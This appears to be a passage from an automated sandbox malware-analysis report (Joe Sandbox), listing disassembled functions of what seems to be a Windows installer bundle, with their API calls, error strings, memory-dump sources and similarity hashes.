GetLastError.KERNEL32 ref: 007DE997

Strings

Failed to post apply message., xrefs: 007DE9C5
userForApplication.cpp, xrefs: 007DE9BB

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: ErrorLastMessagePostThread
String ID: userForApplication.cpp$Failed to post apply message.
API String ID: 2609174426-1304321051
Opcode ID: c0e44d9025be2767ef60a6fa65cf1dc1489abcea0fb3735cf1ff96707a6f4a74
Instruction ID: 699880fe903ff4b95f9543ff6f196653319da10e36b9e0a7a7b87ebf98ed229a
Opcode Fuzzy Hash: c0e44d9025be2767ef60a6fa65cf1dc1489abcea0fb3735cf1ff96707a6f4a74
Instruction Fuzzy Hash: C0F0EC327413306BE7613669AC09FC77BD8FF04BA0F024026FD18EB191D6258C1086E5

Function 007DEA09 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(?,00009000,00000000,?), ref: 007DEA1E
GetLastError.KERNEL32 ref: 007DEA28

Strings

Failed to post detect message., xrefs: 007DEA56
userForApplication.cpp, xrefs: 007DEA4C

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: ErrorLastMessagePostThread
String ID: userForApplication.cpp$Failed to post detect message.
API String ID: 2609174426-598219917
Opcode ID: 57dc6a609b4b8cf0302c2a6f9840edc8830fc84adc09a79a53ff5d7b2ce1e7c7
Instruction ID: c443a9266b675915745450a0c784a5b0795991aeecfe274bbf059e75d35d344d
Opcode Fuzzy Hash: 57dc6a609b4b8cf0302c2a6f9840edc8830fc84adc09a79a53ff5d7b2ce1e7c7
Instruction Fuzzy Hash: A9F0EC327413306BE76166A9AC09F877BD8FF04BA0F018125FD18EB191D6258D00C6E5

Function 007F6A76 Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 007F6B01
__alldvrm.LIBCMT ref: 007F6D02
__alldvrm.LIBCMT ref: 007F6D24

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: f3a74c95afe91129e83f4a200ae329e72b68e1b987d16e4549aa364eb4fd1ab8
Instruction ID: b65d35a7bfdae29e7c5a0a2d4785b8378ad542cd4678c084e2e48965e6d7856a
Opcode Fuzzy Hash: f3a74c95afe91129e83f4a200ae329e72b68e1b987d16e4549aa364eb4fd1ab8
Instruction Fuzzy Hash: 90A13671A0028A9FEB25CF28C8917BEBBE5EF51310F2442ADD6D59B382D63C9D41C761

Function 00805D7F Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 159stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?), ref: 00805E3D
lstrlenW.KERNEL32(?), ref: 00805E55

Strings

dlutil.cpp, xrefs: 00805EDB

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: lstrlen
String ID: dlutil.cpp
API String ID: 1659193697-2067379296
Opcode ID: d83964551951b6c19bc0692d5a38d0f4aaf646e724004230c078e648b6a89210
Instruction ID: 7274e8f053d999738997547f80785aad35dfcca5fc2e053007344fe51a32e8c2
Opcode Fuzzy Hash: d83964551951b6c19bc0692d5a38d0f4aaf646e724004230c078e648b6a89210
Instruction Fuzzy Hash: 49519132901A16ABDB619FA5CC84DAFBBB9FF48750F054025FE11E7290DB319E419BB0

Function 007F90AA Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,E3E85006,007F234D,00000000,00000000,007F3382,?,007F3382,?,00000001,007F234D,E3E85006,00000001,007F3382,007F3382), ref: 007F90F7
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 007F9180
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 007F9192
__freea.LIBCMT ref: 007F919B

Part of subcall function 007F5154: HeapAlloc.KERNEL32(00000000,?,?,?,007F1E90,?,0000015D,?,?,?,?,007F32E9,000000FF,00000000,?,?), ref: 007F5186

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: ByteCharMultiWide$AllocHeapStringType__freea
String ID:
API String ID: 573072132-0
Opcode ID: a8110fb161a74571b9a5fc4e1c4bac4d4d1d5a2fe5e6938797759690940abf94
Instruction ID: d0c2ac1f1ba8165bfee4cbc780fb372df02e689b3f8a3fb646df1a4cf9eaf52f
Opcode Fuzzy Hash: a8110fb161a74571b9a5fc4e1c4bac4d4d1d5a2fe5e6938797759690940abf94
Instruction Fuzzy Hash: F531AE32A0021EEBDF248F65CC49EBE7BA5EB41710F044269FE14D6290E739DD55CBA0

Function 007C4E9C Relevance: 6.1, APIs: 4, Instructions: 110COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,00000000,?,007C545F,?,?,?,?,?,?), ref: 007C4EF6
DeleteCriticalSection.KERNEL32(?,?,?,00000000,?,007C545F,?,?,?,?,?,?), ref: 007C4F0A
TlsFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,007C545F,?,?), ref: 007C4FF9
DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,007C545F,?,?), ref: 007C5000

Part of subcall function 007C1160: LocalFree.KERNEL32(?,?,007C4EB3,?,00000000,?,007C545F,?,?,?,?,?,?), ref: 007C116A

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: CriticalDeleteFreeSection$CloseHandleLocal
String ID:
API String ID: 3671900028-0
Opcode ID: 6540044e3951e27d094316a7b28e490d8dcf06db37c9ae5d80cc1cd316b6f123
Instruction ID: 70c384432c86bff9fffe0d76639953100efbca3fbb780b650d19d7af9c15ba31
Opcode Fuzzy Hash: 6540044e3951e27d094316a7b28e490d8dcf06db37c9ae5d80cc1cd316b6f123
Instruction Fuzzy Hash: FF41A6B1500B05ABDA60FBB4C899FDB73ECBF05341F44082DB65AD3191EB38E6848B25

Function 00803119 Relevance: 6.1, APIs: 4, Instructions: 73memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 0080312C
VariantInit.OLEAUT32(?), ref: 00803138
VariantClear.OLEAUT32(?), ref: 008031AC
SysFreeString.OLEAUT32(00000000), ref: 008031B7

Part of subcall function 0080336E: SysAllocString.OLEAUT32(?), ref: 00803383

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: String$AllocVariant$ClearFreeInit
String ID:
API String ID: 347726874-0
Opcode ID: 5ac6e02dd1b8b3b2baa5049226e14a98677e1eb4cbb8d50c513a7bdb043985c8
Instruction ID: a6e7e676e9e27150ecf84a30c92ab43e73a23af87963f9ef0fa35385ff44a43f
Opcode Fuzzy Hash: 5ac6e02dd1b8b3b2baa5049226e14a98677e1eb4cbb8d50c513a7bdb043985c8
Instruction Fuzzy Hash: 2321093590121AAFCB64DFA5CC48EAEBBB9FF48715F154158F901DB260DB319E05CBA0

Function 007C4B80 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 007CF7F7: RegCloseKey.ADVAPI32(00000000,?,?,00000001,00000000,00000000,?,?,007C4B9F,?,?,00000001), ref: 007CF847

CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,?,?,00000001,00000000,?,?,?), ref: 007C4C06

Part of subcall function 0080082D: CreateProcessW.KERNEL32(00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,00000000), ref: 0080089A
Part of subcall function 0080082D: GetLastError.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 008008A4
Part of subcall function 0080082D: CloseHandle.KERNEL32(?,?,?,?,?,00000000,00000000,00000000), ref: 008008ED
Part of subcall function 0080082D: CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,00000000,00000000), ref: 008008FA

Strings

Unable to get resume command line from the registry, xrefs: 007C4BA5
Failed to re-launch bundle process after RunOnce: %ls, xrefs: 007C4BF0
Failed to get current process path., xrefs: 007C4BC4

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: Close$Handle$CreateErrorLastProcess
String ID: Failed to get current process path.$Failed to re-launch bundle process after RunOnce: %ls$Unable to get resume command line from the registry
API String ID: 1572399834-642631345
Opcode ID: feb046905f50ed4cb9ea47a23357a7827912a1ea2a230ce0ddc165db1460dab9
Instruction ID: 5da7eb8358c45f3dc8493ecf147ae11606a0062d7873ddb0bd0ec109e9eaae0d
Opcode Fuzzy Hash: feb046905f50ed4cb9ea47a23357a7827912a1ea2a230ce0ddc165db1460dab9
Instruction Fuzzy Hash: F1116075D01518FACF22AB98DD11E9EFBB8FF40710B1041AEF900A2250DB358E509F91

Function 007F8731 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,007F88D5,00000000,00000000,?,007F86D8,007F88D5,00000000,00000000,00000000,?,007F88D5,00000006,FlsSetValue), ref: 007F8763
GetLastError.KERNEL32(?,007F86D8,007F88D5,00000000,00000000,00000000,?,007F88D5,00000006,FlsSetValue,00822208,00822210,00000000,00000364,?,007F6130), ref: 007F876F
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,007F86D8,007F88D5,00000000,00000000,00000000,?,007F88D5,00000006,FlsSetValue,00822208,00822210,00000000), ref: 007F877D

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: e04de0d9c870409ff70717ee24606f465cb342aed57f8ab7eccf61ef9c4b2807
Instruction ID: a5ad364e1aab51221eb4b7be0e3c6e0b709a78cfda5b57f637a6c9486a8a4fab
Opcode Fuzzy Hash: e04de0d9c870409ff70717ee24606f465cb342aed57f8ab7eccf61ef9c4b2807
Instruction Fuzzy Hash: 0C01F73621122AABC7615BB99C48B773758BF05BA17300620FA16D7350DB24D801C6F1

Function 007F605E Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00000000,007F19F5,00000000,80004004,?,007F1CF9,00000000,80004004,00000000,00000000), ref: 007F6062
SetLastError.KERNEL32(00000000,80004004,00000000,00000000), ref: 007F60CA
SetLastError.KERNEL32(00000000,80004004,00000000,00000000), ref: 007F60D6
_abort.LIBCMT ref: 007F60DC

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: ErrorLast$_abort
String ID:
API String ID: 88804580-0
Opcode ID: 76aa940aafd4bddba36124703f05c64ab07a7fdc5c526aff42eee34711bf6771
Instruction ID: 84e01c70a527a4075c0b32ff8ffb77e5feb6e4ce4d429231fef03075cb49d227
Opcode Fuzzy Hash: 76aa940aafd4bddba36124703f05c64ab07a7fdc5c526aff42eee34711bf6771
Instruction Fuzzy Hash: 16F0A435100E0CA6C2623734AC0EF3B265AAFC1771F354619FB2996391FF2C98025166

Function 007C730C Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 46COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 007C7318
LeaveCriticalSection.KERNEL32(?,?,?,00000000), ref: 007C737F

Strings

Failed to get value as numeric for variable: %ls, xrefs: 007C736E
Failed to get value of variable: %ls, xrefs: 007C7352

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: Failed to get value as numeric for variable: %ls$Failed to get value of variable: %ls
API String ID: 3168844106-4270472870
Opcode ID: b44b17c113658a6cc3d79e4b9fd7c43c2f2f1688c225dc29506dc2cc33152fac
Instruction ID: b8ad3d60c878e63b16c202996c4175289db59c8e1235deffd5841c2f67f0a200
Opcode Fuzzy Hash: b44b17c113658a6cc3d79e4b9fd7c43c2f2f1688c225dc29506dc2cc33152fac
Instruction Fuzzy Hash: D5015A329451A9FBCF155F54CC05F9E3F69EB04720F01812DFD04AA221CB3A9A60EBD0

Function 007C7481 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 46COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 007C748D
LeaveCriticalSection.KERNEL32(?,?,?,00000000), ref: 007C74F4

Strings

Failed to get value as version for variable: %ls, xrefs: 007C74E3
Failed to get value of variable: %ls, xrefs: 007C74C7

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: Failed to get value as version for variable: %ls$Failed to get value of variable: %ls
API String ID: 3168844106-1851729331
Opcode ID: 4b2677c76b3f19efd07be160bace91ce18578ebd0b413d875f41eb5ff8fa2198
Instruction ID: 66fe47aeecc4386b12546fa80076c78312140c0c6ca753adb9a6078570c16966
Opcode Fuzzy Hash: 4b2677c76b3f19efd07be160bace91ce18578ebd0b413d875f41eb5ff8fa2198
Instruction Fuzzy Hash: EE015E32945169FBCF195F84CC05F9E7F68AB14761F10812DFC04AA220CB399E50EBE0

Function 007C7410 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 40COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00000000,00000000,00000006,?,007C9752,00000000,?,00000000,00000000,00000000,?,007C9590,00000000,?,00000000,00000000), ref: 007C741C
LeaveCriticalSection.KERNEL32(00000000,00000000,00000000,00000000,?,007C9752,00000000,?,00000000,00000000,00000000,?,007C9590,00000000,?,00000000), ref: 007C7472

Strings

Failed to copy value of variable: %ls, xrefs: 007C7461
Failed to get value of variable: %ls, xrefs: 007C7442

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: Failed to copy value of variable: %ls$Failed to get value of variable: %ls
API String ID: 3168844106-2936390398
Opcode ID: 9a5540a95f0e5fd5296d7926f5272468ffc04f77b1250605a52db9ccce642f1b
Instruction ID: f30bec70054793ea8257dd92e8771c5818b9df4f3e5c375851c72df33feccc14
Opcode Fuzzy Hash: 9a5540a95f0e5fd5296d7926f5272468ffc04f77b1250605a52db9ccce642f1b
Instruction Fuzzy Hash: 9DF08C72940268FBCF566F54CC05E9E7F28EB04360F00C128FD04A6321D73A9A20ABD0

Function 007F1246 Relevance: 6.0, APIs: 4, Instructions: 14COMMON

Download Yara Rule

APIs

___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 007F1246
___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 007F124B
___vcrt_initialize_locks.LIBVCRUNTIME ref: 007F1250

Part of subcall function 007F1548: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 007F1559

___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 007F1265

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
String ID:
API String ID: 1761009282-0
Opcode ID: 294756368ebb91e0d837f8d85631f380e5f2af2aa371e18ba28d844398db2aca
Instruction ID: cac229a3cf556d35ff0ca318b59e45671e5f1c658f3ef27d3d2ec1861d50eda7
Opcode Fuzzy Hash: 294756368ebb91e0d837f8d85631f380e5f2af2aa371e18ba28d844398db2aca
Instruction Fuzzy Hash: 00C04C0820424DD45E1036F6227E2FD03442DF23E5FD010C5FB6697703991E042B2133

Function 00804661 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 136registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00800E3F: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00000000,?,00805699,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000,00000000), ref: 00800E52

RegCloseKey.ADVAPI32(00000000,80000002,SYSTEM\CurrentControlSet\Control\Session Manager,00000003,?,00000000,00000000,00000101), ref: 008047C2

Strings

PendingFileRenameOperations, xrefs: 008046B2, 0080479A
SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00804672

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: CloseOpen
String ID: PendingFileRenameOperations$SYSTEM\CurrentControlSet\Control\Session Manager
API String ID: 47109696-3023217399
Opcode ID: 3c58ea09636af146031256ef0c4148385ca8cfb323604f76d5cc03dc824a6fd8
Instruction ID: d717137ae80fdee497226119d10e70df1639950508378eb2ddb19d6d4e3fa498
Opcode Fuzzy Hash: 3c58ea09636af146031256ef0c4148385ca8cfb323604f76d5cc03dc824a6fd8
Instruction Fuzzy Hash: 2441A0F4E4021DEBDB60DF94CC81AAEB7B9FB46710F115069E600E7291D7719E50CB50

Function 00800B49 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 130registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(00000000), ref: 00800CA0

Part of subcall function 00800E3F: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00000000,?,00805699,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000,00000000), ref: 00800E52

Strings

regutil.cpp, xrefs: 00800C8D

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: CloseOpen
String ID: regutil.cpp
API String ID: 47109696-955085611
Opcode ID: 6ea0902c34142cfe5a94cb49eccace82f7ea9d4a3fa2c262543e1c0a7d1cbed5
Instruction ID: 6e81ebcb12fdfccd5f08ac9707ae8cefdf266eef3f5d0fd3d7c4dff23ba377ac
Opcode Fuzzy Hash: 6ea0902c34142cfe5a94cb49eccace82f7ea9d4a3fa2c262543e1c0a7d1cbed5
Instruction Fuzzy Hash: F141E332D01229FBEF615AA4CD08BAE7BA4FB04325F118269ED01EB1E0D7358E50DF90

Function 00800F6E Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 126registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00800FE4
RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 0080101F

Strings

regutil.cpp, xrefs: 00801057

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: QueryValue
String ID: regutil.cpp
API String ID: 3660427363-955085611
Opcode ID: 10b1a6a3165b6572e2169dbddb55cd50fab4b719e4672b38418d4cc045edba58
Instruction ID: 6e107508f08ef6fd96f69a94757fec843808c04325e11f477011f482ef184ca5
Opcode Fuzzy Hash: 10b1a6a3165b6572e2169dbddb55cd50fab4b719e4672b38418d4cc045edba58
Instruction Fuzzy Hash: EA419E71E0052AEBEF209E94CC88EAEBBB9FF44320F104169E915E7290D7358E51DB90

Function 007F65D0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMONLIBRARYCODE

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(0080B508,00000000,00000006,00000001,comres.dll,?,00000000,?,00000000,?,?,00000000,00000006,?,comres.dll,?), ref: 007F66A3
GetLastError.KERNEL32 ref: 007F66BF

Strings

comres.dll, xrefs: 007F664A, 007F6698, 007F66D4

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: ByteCharErrorLastMultiWide
